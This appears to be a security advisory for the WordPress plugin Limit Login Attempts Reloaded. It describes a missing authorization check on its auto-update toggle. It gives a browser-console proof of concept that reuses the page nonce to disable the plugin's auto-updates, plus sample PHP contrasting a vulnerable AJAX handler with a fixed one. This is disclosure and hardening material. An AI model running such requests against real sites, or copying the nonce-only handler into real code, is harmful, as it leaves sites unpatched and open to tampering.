Source: wpexploit | Author: Alex Sanford | WPEX-ID:654BAD15-1C88-446A-B28B-5A412CC0399D
History: Nov 06, 2023 - 12:00 a.m.

Limit Login Attempts Reloaded < 2.25.26 - Admin+ Missing Authorization to Toggle Plugin Auto-Update

Published: 2023-11-06 00:00:00
Author: Alex Sanford
Tags: admin, limit login attempts, missing authorization, auto-update, exploit

AI Score: 4.7 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 14.1%)

Description: The plugin is missing authorization on the toggle_auto_update AJAX action, allowing any user with a valid nonce to toggle the auto-update status of the plugin.

As an Admin, open the Limit Login Attempts page in WP Admin and run the following code in the browser console:

// Read the AJAX nonce that the settings page embeds in its inline script (the "sec" value)
nonce = document.documentElement.innerHTML.match( /sec: '(\w+)'/ )[1];
// Call the toggle_auto_update action directly; the server validates the nonce but
// performs no authorization check on the caller
await (await fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "action=toggle_auto_update&value=no&sec=" + nonce,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
})).text();

Check and see that auto-updates have been disabled for the Limit Login Attempts plugin.
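The server-side pattern behind this class of bug, shown as an added illustrative example rather than the plugin's actual code: a WordPress AJAX handler that only verifies the nonce (the "sec" parameter used above) next to the hardened form that also checks the caller's capability. The function names, the nonce action name and the option name are placeholders.

```php
<?php
// Illustrative example; not Limit Login Attempts Reloaded's own code.
// llar_example_* names and the option/nonce action strings are placeholders.

// BEFORE: the pattern described in the advisory. check_ajax_referer() only
// proves the request came from a page WordPress rendered for this session
// (CSRF protection); it says nothing about whether the user may change
// plugin settings.
function llar_example_toggle_auto_update_vulnerable() {
    check_ajax_referer( 'llar_example_nonce_action', 'sec' );

    $value = ( isset( $_POST['value'] ) && 'yes' === $_POST['value'] ) ? 'yes' : 'no';
    update_option( 'llar_example_auto_update_option', $value );
    wp_send_json_success( array( 'auto_update' => $value ) );
}

// AFTER: nonce check plus an explicit authorization check. Toggling plugin
// auto-updates is an administrator-level action, so require a capability
// that only administrators hold (update_plugins; manage_options is another
// defensible choice) and reject everyone else with HTTP 403.
function llar_example_toggle_auto_update_fixed() {
    check_ajax_referer( 'llar_example_nonce_action', 'sec' );

    if ( ! current_user_can( 'update_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    $value = ( isset( $_POST['value'] ) && 'yes' === $_POST['value'] ) ? 'yes' : 'no';
    update_option( 'llar_example_auto_update_option', $value );
    wp_send_json_success( array( 'auto_update' => $value ) );
}

// Register the hardened handler under the action name seen in the PoC.
// Only the logged-in hook (wp_ajax_) is registered; deliberately no
// wp_ajax_nopriv_ variant, so anonymous requests never reach the handler.
add_action( 'wp_ajax_toggle_auto_update', 'llar_example_toggle_auto_update_fixed' );
```

When auditing a plugin for this bug class, look for every wp_ajax_ callback whose body reaches check_ajax_referer() or wp_verify_nonce() without a matching current_user_can() call before the state change.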
